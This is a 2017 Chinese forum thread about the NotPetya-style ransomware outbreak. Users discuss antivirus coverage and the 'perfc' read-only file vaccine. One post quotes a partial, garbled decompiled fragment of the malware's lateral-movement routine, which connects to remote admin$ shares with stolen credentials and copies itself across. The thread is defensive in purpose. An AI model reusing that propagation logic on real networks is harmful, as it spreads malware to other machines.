卡斯基不认为本次勒索软件是petya的变种，而是全新勒索软件

livejunjie

火绒加入这个防护功能了吗？

我就是XXX

livejunjie 发表于 2017-7-1 15:17
火绒加入这个防护功能了吗？

官网这么说的，如图。

livejunjie

我就是XXX 发表于 2017-7-4 11:09
官网这么说的，如图。

谢谢，这我就放心了

PeepingTom

这一个名称为“perfc.dat”可以自己写
这个靠谱实用，路徑放在C:/WINDOWS下，... ...如下图。是抽出病毒代码一段写的(須先管理員权限ReadOnly挡)
用記事本notepad.exe就可 :

1. wsprintfW(&Name, L"\\\\%s\\admin[        DISCUZ_CODE_0        ]quot;, a1);
   
2. NetResource.dwScope = 0;
   
3. memset(&NetResource dwType, 0, 0x1Cu);
   
4. NetResource.1pRemoteName = &Name;
   
5. NetResource.dwType = 1;
   
6. get_current_module_name_convert_tows(&v23);
   
7. wsprintfW(&FileName, L"\\\\%ws\\admin$\\%ws", a1, &v23);
   
8. while (  1  )
   
9. {
   
10.    pszPath = 0;
    
11.    v11 = v4;
    
12.    v18 = WNetAddConnection2W(&NetResource, 1pPassword, 1pUserName, 0);
    
13.    wsprintfW(&pszPath, L"\\\\%ws\\admin$\\%ws", a1, &v23);
    
14.    v5 = PathFindExtentionW(&pszPath);
    
15.    if ( v5 )
    
16.    {
    
17.      *v5 = 0;
    
18.      if ( PathFileExistsW(&pszPath) )
    
19.      {
    
20.         v13 = 1;

复制代码

##############################################
注:  存為“perfc”挡案亦可，路徑一樣，